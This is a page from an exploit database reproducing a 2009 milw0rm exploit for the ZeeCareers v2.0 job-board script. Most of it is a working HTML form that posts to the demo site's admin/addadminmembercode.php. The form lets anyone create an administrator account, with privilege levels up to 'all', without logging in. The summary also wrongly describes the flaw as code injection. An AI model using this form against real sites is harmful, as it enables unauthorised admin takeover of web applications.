header-logo
Suggest Exploit
vendor:
ZeeCareers v2.0
by:
x.CJP.x
8,8
CVSS
HIGH
Insecure Direct Object Reference
639
CWE
Product Name: ZeeCareers v2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ZeeCareers v2.0 (addadminmembercode.php) [ Add Admin ]

ZeeCareers v2.0 is vulnerable to Insecure Direct Object Reference. The addadminmembercode.php script does not properly validate user-supplied input, allowing an attacker to inject arbitrary code into the application. This can be exploited to add an admin user to the application.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

<!--
[»] ZeeCareers v2.0 (addadminmembercode.php) [ Add Admin ]
[»] Live Demo: http://www.ZeeCareers.com/demo/index.php
[»] By: x.CJP.x
[»] Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,B0ub0u,Mun[3]im.. :=)
[»] Note:Walleh Ghir 3la Jalek Lakhater W3adtek [ ThE g0bL!N ] W Ismahli :$;
!-->
<html>
<head>
<title>ZeeCareers v2.0 (addadminmembercode.php) [ Add Admin ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="padding-left:2px">
  <tr>
    <td colspan="3">
<center><h3><(=[ x.CJP.x ]=)></h3></center>
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="padding-left:2px">
  
</table></td>
  </tr>
  <tr>
    <td width="98%" valign="top" style="padding-left:2px;"><html>
<script language="javascript">
function	validate(form)
{
	if(form.name.value == "" || !isNaN(form.username.value))
	{
		alert("Please enter your name correctly.");
		form.username.focus();
		return	false;
	}
	if(form.name.value == "" || !isNaN(form.fname.value))
	{
		alert("Please enter your name correctly.");
		form.fname.focus();
		return	false;
	}
	if(form.name.value == "" || !isNaN(form.lname.value))
	{
		alert("Please enter your name correctly.");
		form.lname.focus();
		return	false;
	}
	//email Verification
if(!verifyemail(form.email.value))
      {
        return false;
      }
 function verifyemail(addr)
  {
      var invalidchar="\/|'\\;,:?!<>=-()[](\`~^%$#&*;"  ;

		  for(i=0;i<invalidchar.length;i++)
		   {
		      if(addr.indexOf(invalidchar.charAt(i),0) > -1)

		        {
					alert("email Id Contain invalid character");

					form.email.value="";

					form.email.focus();

					return(false);
		        }
		  }
		   var atpos=addr.indexOf("@",0);

		    if(addr.indexOf("@",0)== -1)

		        {
					alert("email Id Must Contain a @ in The Domain Name");

					form.email.value="";

					form.email.focus();

					return(false);
		        }
		   if(atpos==0)

		     {
				alert("email Id must not start with @");

				form.email.value="";

				form.email.focus();

				return(false);

		     } 
		      if(addr.indexOf("@",atpos+1)>-1)

		       {
					alert("email Id Must contain @ only one");

					form.email.value="";

					form.email.focus();

					return(false); 
		       } 
		      if(addr.indexOf(".",atpos)== -1)

		        {
					alert("email Id Must Contain a Period in The Domain Name");

				   form.email.value="";

				   form.email.focus();

					return(false);
		        } 
		        if(addr.indexOf("@.",0)!=-1)

		         {
					alert("Period must not immediately follow @ in Email");

					form.email.value="";

					form.email.focus();

					return(false) 
		         }
		         if(addr.indexOf("..",0)!=-1)

		          {
					alert("Two Periods must not be adjacent in email Address");

					form.email.value="";

					form1.email.focus();

					return(false)

		          }
		          if(addr.lastIndexOf(".")== (addr.length - 1) )

		          {
					alert("Period ../connot be the last character in Email");

					form.email.value="";

					form.email.focus();

					return(false);
		          }
		      return true;
	 }
	
	if(form.password.value == "")
	{
		alert("Please enter your password.");
		form.password.focus();
		return	false;
	}
	if(form.password1.value == "")
	{
		alert("Please re-enter your password.");
		form.password1.focus();
		return	false;
	}
	if(form.password.value != form.password1.value)
	{
		alert("The passwords you entered doesn't match.");
		form.password.focus();
		return	false;
	}
}

</script>
<body>
<br>

<table width="100%" style="border: 1px solid rgb(169, 211, 225);" align="left">
					<form id="subsform" name="subsform" method="post" action="http://www.zeecareers.com/demo/admin/addadminmembercode.php" onSubmit="return validate(this);">
					<input name="privilageid" type="hidden" id="privilageid" value="add"/>
                  <tr valign="middle">
                    <td height="21" colspan="4" align="left" class="bluebg"><strong>Add New Admin Member </strong></td>
                    </tr>
                  <tr>
                    <td width="23%" align="right" valign="top" class="normal">Username</td>
                    <td width="3%" align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><div align="left">
                        <input name="username" type="text" class="textbox" id="username" size="40" maxlength="40" />
                    </div></td>
                  </tr>
                  <tr>
                    <td align="right" valign="top" class="normal">Firstname</td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><input name="fname" type="text" class="textbox" id="fname" size="40" maxlength="40" /></td>
                  </tr>
                  <tr>
                    <td align="right" valign="top" class="normal">Lastname</td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><input name="lname" type="text" class="textbox" id="lname" size="40" maxlength="40" /></td>
                  </tr>
                  <tr>
                    <td valign="top" class="deepbluetext"><div align="right" class="normal">Email</div></td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><div align="left">
                        <input name="email" type="text" class="textbox" id="email" size="40" maxlength="40" />
                    </div></td>
                  </tr>
                  <tr>
                    <td height="22" valign="top" class="deepbluetext"><div align="right" class="normal">Password</div></td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><div align="left">
                        <input name="password" type="password" class="textbox" id="password" size="40" maxlength="40" />
                    </div></td>
                  </tr>
                  <tr>
                    <td height="22" valign="top" class="deepbluetext"><div align="right" class="normal">Password Repeat </div></td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><div align="left">
                        <input name="password1" type="password" class="textbox" id="password1" size="40" maxlength="40" />
                    </div></td>
                  </tr>
                  
                  <tr>
                    <td height="47" valign="top" class="deepbluetext"><div align="right" class="normal">Privilages </div></td>
                    <td align="center" valign="top" class="deepbluetext">:</td>
                    <td colspan="2" valign="top"><table width="54%" border="0" cellspacing="1" cellpadding="0" style="border: 1px solid rgb(169, 211, 225);" align="left">
                      <tr class="bluebg">
                        <td width="11%" align="center"><strong>All</strong></td>
                        <td width="14%" align="center"><strong>Add</strong></td>
                        <td width="13%" align="center"><strong>Edit</strong></td>
                        <td width="17%" align="center"><strong>Delete</strong></td>
                        <td width="27%" align="center"><strong>Read only </strong></td>
                        <td width="18%" align="center"><strong>Email</strong></td>
                      </tr>
                      <tr>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="all"></td>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="add"></td>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="edit"></td>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="delete"></td>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="read"></td>
                        <td align="center" bgcolor="#E7E8DB"><input name="privilages" type="radio" value="read"></td>
                      </tr>
                    </table></td>
                  </tr>
                  
                  
                  
                  <tr>
                    <th height="26" valign="top" scope="row">&nbsp;</th>
                    <td align="center" valign="top">&nbsp;</td>
                    <td colspan="2" valign="top"><input name="btnsubmit" type="submit" id="btnsubmit" value="Add Member" /></td>
                  </tr>
                </form>
            </table>
</td>
</tr>
</table>
</body>
</html>

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR